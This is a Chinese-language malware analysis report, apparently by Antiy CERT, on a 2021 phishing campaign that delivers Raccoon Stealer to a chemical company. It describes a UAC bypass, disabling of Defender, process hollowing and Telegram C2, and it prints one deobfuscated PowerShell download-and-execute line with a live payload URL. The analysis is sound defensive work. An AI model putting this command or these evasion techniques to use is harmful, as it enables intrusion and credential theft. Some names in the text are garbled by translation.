1.概述2021年5月,安田CERT侦破一起针对国内某化工生产企业的窃密行动。安田CERT分析后发现,浣熊盗利用电报、互联网存档和博客作者博客分发了一个木马窃取活动。该攻击主要通过钓鱼邮件传播,将邮件内容伪装成企业客户的需求,诱导受害者下载附件并执行解压后的恶意程序。Ann CERT跟踪发现,该攻击活动自2021年4月以来一直在进行,攻击者使用多种手法进行反溯源和反查杀,如使用Telegram作为C2进行通信、利用注册表实现恶意载荷访问、窃密载荷不落地和削弱Microsoft Defender防病毒功能等。针对其多种方式反追踪溯源的攻击特点,安天将其命名为“幻鼠”组织,与Gorgon组织TTP手法类似。.
浣熊盗密木马最早出现于2019年4月,是暗网最受关注的10大恶意软件之一。目前已感染全球数十万台设备1 .该木马具有窃取登录凭据、信用卡信息、加密货币钱包、浏览器信息等多种恶意功能。
2.对应于事件的ATTCK映射图。攻击样本技术特征分布图:
图2-1对应技术特征的ATTCK映射
具体攻击技术行为描述表:
表2-1 ATTCK技术行为描述表
3.攻击过程3.1 攻击流程图
本次攻击中攻击者的攻击流程图如下:
图3-1攻击流程图
3.2 初始访问
攻击者通过模仿国内某化工生产企业的邮件模板制作钓鱼邮件。邮件里有压缩包,解压后压缩包是名为“无锡217 UY 593325.hta”的html应用。
图3-2网络钓鱼邮件的内容
3.3 连接C2下载窃密载荷
附件程序的第一个作用是连接恶意加载相关URL下载名为“Preshuru.txt”的恶意文件,调用PowerShell命令释放并执行秘密窃取加载浣熊Steale木马,在示例分析章节会详细分析。
攻击者在Internet Archive中创建了一个名为“Preshuru”的项目,并在该项目中挂起恶意文件“Preshuru.txt ”,通过使用正常网站程序存储恶意代码来提高溯源的难度。
3.4 添加计划任务
附件的第二个作用是设置调度任务,访问恶意有效载荷相关的URL,下载并执行恶意代码。安田CERT发现,计划任务的功能主要是Fodhelper UAC绕过并削弱微软Defender的反病毒功能。
图3-3添加计划任务
攻击者利用blogger设置的博客传播恶意程序,如下图所示:
图3-4攻击者的博客页面
查看攻击者博客页面的源代码,发现攻击者用Escape加密了一个字符串。
图3-5转义加密字符串
Ann CERT解密字符串,发现这个字符串的作用是用VBscript.shell执行PowerShell命令
图3-6解密字符串
Powerhsell的反混淆揭示了攻击者连接与恶意有效载荷相关的URL并下载其他恶意程序。反混淆后的PowerShell命令如下:
钋
werShell(New-objectSystem.Net.WebClient)Downloadstring(https://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_4906e68401a54bdf99cdcca2ef189f9d.txt) |I`E`X下载的文件主要功能为:使用PowerShellSystem.Net.WebClient下载并执行恶意载荷,如下所示:
图3-7 访问恶意URL下载载荷
表3-1 下载恶意载荷
恶意载荷kuchb.vbs脚本的主要功能是借助注册表与白名单程序C:\Windows\system32\fodhelper.exe(合法的Microsoft可执行文件)绕过UAC(用户帐户控制)。
攻击者通过CLSID{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}得到WshShell对象,用以操作注册表项和运行程序。攻击者通过构造如下的注册表运行操作系统的UAC白名单程序“fodhelper.exe”,该程序会以管理员权限运行且不弹出UAC确认窗口,“batman.bat”会被调用且自动获得管理员权限。
图3-8 kuchb.vbs添加注册表
bstman.bat脚本主要功能为执行“C:\Users\Public\clone.vbs”脚本。clone.vbs脚本的主要功能为使用VBScript脚本更改默认进程安全级别,并使用多种方式禁止或削弱Microsoft Defender防病毒功能。
在隐藏窗口中创建进程,解密并运行一段被加密的PowerShell命令,主要功能是禁用Microsoft Defender实时扫描部分文件夹中的文件和部分指定的进程打开的文件。
图3-9 禁用Microsoft Defender部分功能
解密的Powershell代码直接修改注册表项禁用Microsoft Defender防病毒,调用命令行执行禁用Microsoft Defender防病毒应用程序,停止WinDefend服务启动,禁用入侵预防系统,禁用实时监控,禁用脚本扫描,取消受控文件夹访问,取消网络保护审核模式和取消云保护等命令。
图3-10 禁用Microsoft Defender
3.5 添加注册表
附件程序第三部分功能是设置四个开机启动项。设置开机启动项的功能是访问4个不同的网址下载不同功能模块。添加注册表如下图所示,其中部分功能与前述功能相同。
图3-11 添加注册表
注册表功能如下表所示:
表3-2 创建注册表以及主要功能
3.5.1 连接C2下载窃密载荷木马
与前述小节中连接C2下载窃密载荷实现的功能相同,该注册表同样实现下载并执行窃密载荷Raccoon Stealer窃密木马,不同之处在于将一段PowerShell命令添加到注册表中,实现开机自动执行该命令,这种实现功能的方法更加隐秘,增强了载荷的持久化效果。
图3-12 下载窃密载荷Raccoon Stealer窃密木马
3.5.2 获取用户系统信息
注册表backpup实现开机自动访问恶意载荷相关URL,该组件的主要功能是获取用户浏览器插件信息、用户公网IP地址和系统信息等。
安天CERT分析发现该URL访问了一个攻击者使用blogger搭建的博客,查看该网页源代码时发现了一段加密的字符串,将这段字符串解密后发现其还访问另一个URL,如下图所示:
图3-13 解密后的字符串
该网址打开后显示一个空白页,安天CERT查看该网页源代码,发现攻击者使用PluginDetectv脚本进行相关恶意行为,实现的主要功能是获取用户系统信息、浏览器版本信息、相关插件信息、用户公网IP和局域网IP地址等信息。
图3-14 攻击者使用的PluginDetectv脚本
3.5.3 Fodhelper UAC绕过、削弱Microsoft Defender防病毒功能
注册表task1实现开机自动连接恶意载荷相关URL并下载恶意程序,安天CERT分析发现该注册表实现的功能跟计划任务中的功能一致,实现UAC绕过、削弱Microsoft Defender防病毒功能。实现后续持久化,确保恶意功能的实现。
4. 样本分析4.1 Preshuru.txt脚本分析
攻击者在Internet Archive中创建了一个名为“Preshuru”的项目,该项目中存在上述下载的Preshuru.txt恶意文件。攻击者通过这种方式提高溯源难度。
图4-1 “Preshuru”的项目
攻击者将可执行文件的16进制数据转储为字符串,通过PowerShell命令对字符串进行还原,安天CERT分析人员发现该PowerShell中存在两个可执行文件,一个为Raccoon Stealer窃密木马,另一个为恶意加载器DLL。攻击者首先调用PowerShell将字符串转化为PE文件,然后启动系统自带“MSBuild.exe”文件进程,调用恶意加载器,最后通过“进程镂空”技术将Raccoon Stealer窃密木马注入到白文件MSBuild.exe进程中。
图4-2 Preshuru.txt恶意文件
4.2 恶意加载器分析
表4-1 dll样本标签
DLL文件时间戳经过伪造,其主要功能是采用“进程镂空”技术将Raccoon Stealer窃密木马注入到MSBuild.exe白文件中避免杀软检测。
创建挂起的MSBuild.exe进程读取线程上下文,如下图所示:
图4-3 读取线程上下文
读取MSBuild.exe原始入口点,卸载MSBuild.exe占用的内存,如下图所示:
图4-4 卸载MSBuild.exe占用的内存
在MSBuild.exe进程中分配一个内存空间,将Raccoon Stealer窃密木马注入到MSBuild.exe的进程中。如下图所示:
图4-5 注入到MSBuild.exe的进程
通过修改MSBuild.exe的区段、修改MSBuild.exe的入口点和恢复主线程,最终实现依附于MSBuild.exe白文件执行Raccoon Stealer窃密木马文件。
图4-6 修改MSBuild.exe的入口点、恢复主线程
4.3 Raccoon Stealer窃密木马分析
表4-2 Raccoon Stealer窃密木马标签
病毒名称
Trojan/Win32.Raccoon
MD5
9C22ED2D1E95E3896E695038BE6E5A5B
处理器架构
Intel 386 or later, and compatibles
文件大小
573.00 KB (586752 bytes)
文件格式
BinExecute/Microsoft.EXE<:X86>
时间戳
2021-03-21 13:29:45
数字签名
无
加壳类型
无
编译语言
Microsoft Visual C++
VT首次上传时间
2021-05-23 04:26:08
VT检测结果
52/69
安天CERT发现释放的窃密载荷为Raccoon Stealer窃密木马,该木马首次出现于2019年4月,是暗网中最受关注的10大恶意软件之一,目前已经感染了全球数十万台设备。该木马具有窃取登录凭据、信用卡信息、加密货币钱包和浏览器信息等恶意功能。
图4-7 Raccoon Stealer窃密木马售卖
Raccoon Stealer窃密木马运行后获取系统语言设置,当系统语言设置为俄语、乌克兰语、白俄罗斯语、哈萨克语、吉尔吉斯语、亚美尼亚语、塔吉克语和乌兹别克语时则退出程序。
图4-8 获取系统语言设置
Raccoon Stealer窃密木马与hxxps://telete.in/telehabarik建立连接,将sqlite3.dll文件下载到“%USERPROFILE%/AppData/LocalLow”目录中。SQLite是一个C语言编写的一个小型的SQL数据库引擎。
图4-9 SQLite介绍
在浏览器中访问Raccoon Stealer窃密木马连接的C2时显示如下画面。
图4-10 访问C2返回的界面
Raccoon Stealer窃密木马与C2建立连接,将一个名为“pY4zE3fX7h.zip”的文件下载到%USERPROFILE%\AppData\LocalLow\gC9tT2iQ3s\目录下并解压,解压后的文件包含带有Mozilla数字签名的Mozilla DLL。
图4-11 带有Mozilla数字签名的Mozilla DLL
攻击者利用解压获得的Mozilla DLL,从Mozilla产品中收集数据。涉及的软件包含Firefox、Waterfox、SeaMonkey、Pale Moon和Thunderbird等。利用从C2下载的sqlite3收集浏览器数据,包含Login Data、Cookies、User data、Web Data和浏览器中保存的加密货币钱包等。将从浏览器中获取的数据存放在相应目录中,涉及的浏览器如下表所示:
表4-3 收集浏览器
获取存储在邮件应用程序中的帐号信息保存在相应目录中,涉及到的邮件应用程序如下表所示
表4-4 获取账号信息的邮件应用程序
获取密码管理器中的密码,涉及到的密码管理器如下表所示:
表4-5 获取密码管理器中的密码
收集数据货币钱包如下表所示:
表4-6 收集数据货币钱包
获取用户详细系统信息保存在System Info.txt文件中,获取用户详细系统信息如下图所示:
图4-12 获取系统信息功能
获取用户系统屏幕截图,如下图所示:
图4-13 获取屏幕截图的关键代码
获取用户信息完成后,将保存数据的文件压缩上传至C2。压缩包中包含客户机浏览器保存的登录密码、浏览记录、邮箱客户端与邮箱服务的密码和客户端桌面截屏。
5. 战术分析在本次攻击活动中,攻击者使用了多种手段来规避溯源和查杀。
5.1 反溯源
安天CERT在分析过程中发现攻击者利用Internet Archive(互联网档案)和blogger博客来传播恶意文件以及窃密载荷使用Telegram进行通信。攻击者通过利用正常的域名网站下挂恶意代码方式防止被追踪溯源。
5.2 反查杀
利用注册表实现恶意载荷访问:设置四个注册表开机启动项访问不同的恶意载荷相关URL进行不同的功能,利用注册表实现恶意载荷访问。
最终窃密载荷不落地:攻击者调用PowerShell将字符串转化为PE文件,运行白文件“MSBuild.exe”,调用恶意DLL文件,通过进程镂空技术将EXE注入到白文件MSBuild.exe进程中,使最终的载荷不落地避免杀软检测。
削弱Microsoft Defender防病毒功能:样本会在隐藏窗口中创建进程,解密并运行一段被加密的PowerShell命令,其主要功能是禁用Microsoft Defender计划和实时扫描部分文件夹中的文件与部分指定的进程打开的任何文件。修改注册表项禁用Microsoft Defender防病毒,调用命令行执行禁用Microsoft Defender防病毒应用程序,停止WinDefend服务启动,禁用入侵预防系统,禁用实时监控,禁用脚本扫描,取消受控文件夹访问,取消网络保护审核模式和取消云保护等命令。
6. 关联分析安天CERT通过跟踪Internet Archive上“Preshuru”项目的创建时间以及访问次数发现该攻击活动从2021年4月一直持续至今,并推测可能存在上千感染者。
图6-1 Internet Archive上“Preshuru”项目
7. IoCs
8. 参考链接<1> https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block
